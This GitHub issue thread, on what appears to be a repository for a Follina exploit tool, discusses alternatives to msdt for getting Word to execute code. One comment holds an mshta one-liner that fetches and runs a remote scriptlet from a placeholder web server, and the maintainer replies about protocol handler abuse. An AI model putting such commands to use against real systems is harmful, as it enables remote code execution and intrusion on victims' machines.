Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Msdt alternative #34

Open
hastalamuerte opened this issue May 1, 2023 · 3 comments
Open

Msdt alternative #34

hastalamuerte opened this issue May 1, 2023 · 3 comments

Comments

@hastalamuerte
Copy link

hastalamuerte commented May 1, 2023

@chvancooten thanks for your follina script !

what if use not msdt , can Ms word spawn something another Url handlers that can execute pwsh ?

Here is a bit of em what have bypass and execute options
Here is mshta nandisec/mshta@909383b here is a list of https://lolbas-project.github.io/#

Like a mshta.exe vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) - something like that

@hastalamuerte hastalamuerte changed the title what if use not msdt , can Ms word spawn something that can execute pwsh ? Here is a bit of em what have bypass and execute options nandisec/mshta@909383b https://lolbas-project.github.io/# Msdt alternative May 1, 2023
@hastalamuerte
Copy link
Author

hastalamuerte commented May 1, 2023

IMG_20230501_052512.jpg

Seems it's possible.

And one question, should I always host and html payload for hooking msdt , or if I choose -c it will be inside doc with my command?
https://github.com/j00sean/CVE-2022-44666 some of search-ms using

@chvancooten
Copy link
Owner

Hi, thanks for your suggestion! As far as I'm aware, most protocol handlers that have an abuse case with public CVE have been patched one way or another. However, I'm sure there are plenty more abusable protocols to be discovered in the depths of Microsoft's products :). This project could be used as a boilerplate for that. Feel free to submit PRs or fork if you find anything interesting!

W.r.t. your other question: The remote doc is required for the command execution for this specific CVE.

@chvancooten
Copy link
Owner

Hi @hastalamuerte, IMO this is quite a different type of protocol handler, and not related to the Follina exploit as it stands. If you would like to see it integrated in the tool I'm open to suggestions, but due to the user interaction I'm not sure how it would fit to be honest.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants